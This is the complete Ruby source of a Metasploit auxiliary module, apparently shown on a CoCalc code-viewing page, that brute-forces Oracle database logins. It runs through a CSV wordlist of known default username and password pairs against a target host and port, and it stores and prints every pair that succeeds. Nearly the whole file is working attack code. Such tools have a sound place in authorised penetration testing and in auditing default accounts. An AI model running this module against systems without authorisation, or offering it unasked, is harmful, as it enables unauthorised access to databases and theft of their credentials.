CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'csv'
7

8
class MetasploitModule < Msf::Auxiliary
9
  include Msf::Auxiliary::Report
10
  include Msf::Exploit::ORACLE
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Oracle Account Discovery',
15
      'Description'    => %q{
16
        This module uses a list of well known default authentication credentials
17
        to discover easily guessed accounts.
18
      },
19
      'Author'         => [ 'MC' ],
20
      'License'        => MSF_LICENSE,
21
      'References'     =>
22
        [
23
          [ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv' ],
24
          [ 'URL', 'https://seclists.org/fulldisclosure/2009/Oct/261' ],
25
        ],
26
      'DisclosureDate' => '2008-11-20'))
27

28
      register_options(
29
        [
30
          OptPath.new('CSVFILE', [ false, 'The file that contains a list of default accounts.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'oracle_default_passwords.csv')]),
31
        ])
32

33
      deregister_options('DBUSER','DBPASS')
34

35
  end
36

37
  def report_cred(opts)
38
    service_data = {
39
      address: opts[:ip],
40
      port: opts[:port],
41
      service_name: opts[:service_name],
42
      protocol: 'tcp',
43
      workspace_id: myworkspace_id
44
    }
45

46
    credential_data = {
47
      origin_type: :service,
48
      module_fullname: fullname,
49
      username: opts[:user],
50
      private_data: opts[:password],
51
      private_type: :password
52
    }.merge(service_data)
53

54
    login_data = {
55
      last_attempted_at: Time.now,
56
      core: create_credential(credential_data),
57
      status: Metasploit::Model::Login::Status::SUCCESSFUL
58
    }.merge(service_data)
59

60
    create_credential_login(login_data)
61
  end
62

63
  def run
64
    return if not check_dependencies
65

66
    list = datastore['CSVFILE']
67

68
    print_status("Starting brute force on #{datastore['RHOST']}:#{datastore['RPORT']}...")
69

70
    fd = CSV.foreach(list) do |brute|
71
      datastore['DBUSER'] = brute[2].downcase
72
      datastore['DBPASS'] = brute[3].downcase
73

74
      begin
75
        connect
76
        disconnect
77
      rescue ::OCIError => e
78
        if e.to_s =~ /^ORA-12170:\s/
79
          print_error("#{datastore['RHOST']}:#{datastore['RPORT']} Connection timed out")
80
          break
81
        else
82
          vprint_error("#{datastore['RHOST']}:#{datastore['RPORT']} - LOGIN FAILED: #{datastore['DBUSER']}: #{e.to_s})")
83
        end
84
      else
85
        report_cred(
86
          ip: datastore['RHOST'],
87
          port: datastore['RPORT'],
88
          service_name: 'oracle',
89
          user: "#{datastore['SID']}/#{datastore['DBUSER']}",
90
          password: datastore['DBPASS']
91
        )
92
        print_good("Found user/pass of: #{datastore['DBUSER']}/#{datastore['DBPASS']} on #{datastore['RHOST']} with sid #{datastore['SID']}")
93
      end
94
    end
95
  end
96
end
97

98